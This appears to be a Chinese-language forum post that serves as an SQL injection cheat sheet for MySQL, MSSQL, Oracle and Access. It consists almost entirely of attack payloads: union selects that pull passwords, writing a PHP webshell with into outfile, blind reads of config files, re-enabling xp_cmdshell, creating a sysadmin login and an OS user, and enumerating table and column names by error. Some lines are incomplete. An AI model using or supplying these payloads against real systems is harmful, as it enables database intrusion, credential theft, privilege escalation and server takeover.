各种数据库注入常识
MySQL注入常用语句/函数-------------/*!30000 s
union select 1,2,3,4,password,6 from manager
into outfile '/home/web1/shell.php'
instr(substring(load_file('/home/web1/config.php'),'password'))>0
ord(substring(load_file('/home/web1/config.php'),1,1))>112
ord(substring(load_file(0x2F686F6D652F776562312F636F6E6669672E706870),1,1))>112
MSSQL注入常用语句/函数-------------
select count(*) FROM master..sysobjects where xtype = 'X' AND name = 'xp_cmdshell'
And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 //依次得到表名
And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)+NCHAR(101)+NCHAR(119)+NCHAR(115)+NCHAR(95)+NCHAR(85)+NCHAR(115)+NCHAR(101)+NCHAR(114)) Order by colid) T Order by colid desc)>0 //得到列名
And (Select Cast(Count(1) as varchar(8000))+char(97) From Where 1=1)>0 //得到字段的记录个数
And (Select Top 1 isNull(cast( as varchar(8000)),char(32))+char(124) From (Select Top 1 sName From Where 1=1 Order by sName) T Order by sName desc)>0 //得到字段的值
select IS_SRVROLEMEMBER('sysadmin')
select user_name()
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
exec master.dbo.sp_addlogin test,test
exec master.dbo.sp_addsrvrolemember test,sysadmin
exec master.dbo.sp_password test,123456,test
exec master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'
insert into temp(s1) exec master.dbo.xp_cmdshell 'dir d:\web\*.asp /s/a'
insert into temp(s1) exec master.dbo.xp_subdirs 'd:\'
insert into temp(s1,s2) exec master.dbo.xp_dirtree 'd:\'
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
ascii('a')=97
Oracle注入常用语句/函数------------
0<>(select count(*) from all_tables) and 1=1
0<>(select count(*) from user_tables) and 1=1
0<>(select count(*) from user_tab_columns) and 1=1
0<>(select count(*) from user_tab_columns where column_name like chr(37)||chr(80)||chr(65)||chr(83)||chr(83)||chr(37)) and 1=1
chr(97)||chr(98) ascii length substr
Acess注入常用语句/函数-------------
exists(select * from admin where asc(mid(username,1,1))>97)
页:
[1]